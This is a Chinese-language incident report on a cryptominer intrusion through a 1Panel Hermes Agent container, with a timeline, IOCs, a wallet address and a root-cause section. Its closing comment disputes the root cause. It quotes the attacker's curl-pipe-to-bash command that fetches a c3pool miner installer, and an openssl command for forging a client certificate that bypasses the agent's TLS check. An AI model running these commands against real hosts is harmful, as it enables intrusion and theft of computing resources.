关于 1Panel Hermes Agent(涉及 CVE-2025-54424 等漏洞)远程代码执行导致挖矿木马入侵的安全事件反馈

漏洞反馈归档:1Panel Hermes Agent 远程代码执行致挖矿入侵事件

一、事件概述

项目 内容
反馈日期 2026-07-20
反馈人 个人网站中心运维团队
涉及产品 1Panel Hermes Agent(1Panel 应用商店分发)
受影响版本 1panel/hermes-agent:2026.6.19(镜像)、Hermes Agent < 0.16.0[reference:0][reference:1]、1Panel <= v2.0.5[reference:2][reference:3][reference:4]
事件等级 CRITICAL(严重)
CVE 关联 CVE-2025-54424、CVE-2026-9366、CVE-2026-9368、CVE-2026-9369、CVE-2026-53870、GHSA-8j63-96wh-wh3j[reference:5]

本反馈归档基于阿里云安全中心(SAS)2026年7月20日捕获的多条 CRITICAL 级别安全告警及 Incident 自动聚合分析(Incident UUID: 5129d4da81943c22ec1d7ee287248482)。

二、事件详情

2.1 攻击时间线

时间(2026-07-20) 事件描述
09:30:07 攻击者通过 Hermes Agent 容器执行 /usr/bin/bash,加载 /tmp/hermes-snap-*.sh 临时脚本
09:30:12 容器内执行 curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s [钱包地址],下载并运行挖矿安装脚本
09:31:28 云安全中心触发「蠕虫病毒命令」告警(规则ID: 449),标记为 CRITICAL
09:31:55 XMRig 挖矿进程(PID: 853137)启动,路径 /opt/data/home/c3pool/xmrig
09:31:55 云安全中心触发「挖矿程序」告警,文件 SHA256: 98dafd1063...
09:32:18 云安全中心 AI 引擎将以上告警自动聚合为安全事件(Incident),确认主机已被成功入侵

2.2 入侵 IOC(威胁指标)

类别 指标
恶意容器 c20111694051f73180627cf64f4fab60bf85643dd4de80d59098946c8cd60828
容器名称 1Panel-hermes-agent-PS6W
恶意镜像 1panel/hermes-agent:2026.6.19(镜像ID: 1panel/hermes-agent@sha256:c380968a3e3a451268c172d8c800b98c857d3159aa7575cf73de3e31d0c3083b)[reference:6]
恶意进程 /opt/data/home/c3pool/xmrig(PID: 853137)
文件 SHA256 98dafd1063ff4b430ae105e3af415e7c273e864c7b6d60b7eb57723a81c6759b
文件 MD5 8e8f75611768da032cf38c212f063ed6
下载域名 download.c3pool.org
恶意脚本 setup_c3pool_miner.sh
矿池钱包 45iaJGAyVfRVNJJFKbJEJ3FncQaxetu2iHHo2ttqNoJqcxiCNBazybZWgR2rgyos647SpEPRJT63o3Kcez7t5AHL24B2KGE

三、漏洞根因分析

3.1 核心漏洞:1Panel Agent TLS 证书验证绕过(CVE-2025-54424)

1Panel v2.0.5 及以下版本中,Core 端与 Agent 端通过 HTTPS 通信时,Agent 端 TLS 认证策略设置为 tls.RequireAnyClientCert[reference:7][reference:8],仅要求客户端提供证书,但不验证证书签发 CA。应用层仅检查证书 CN 字段是否为 panel_client,未验证证书颁发者、有效期等关键信息[reference:9][reference:10]。

攻击者可通过自签名证书绕过 TLS 校验

openssl req -x509 -newkey rsa:2048 -keyout panel_client.key -out panel_client.crt -days 365 -nodes -subj "/CN=panel_client"

这个被挖矿的原因是因为没有用户名/密码保护
hermes 一开始就是没有这个的
新版本已经支持了 1Panel 已经跟进支持

1Panel 的 CVE 和这个无关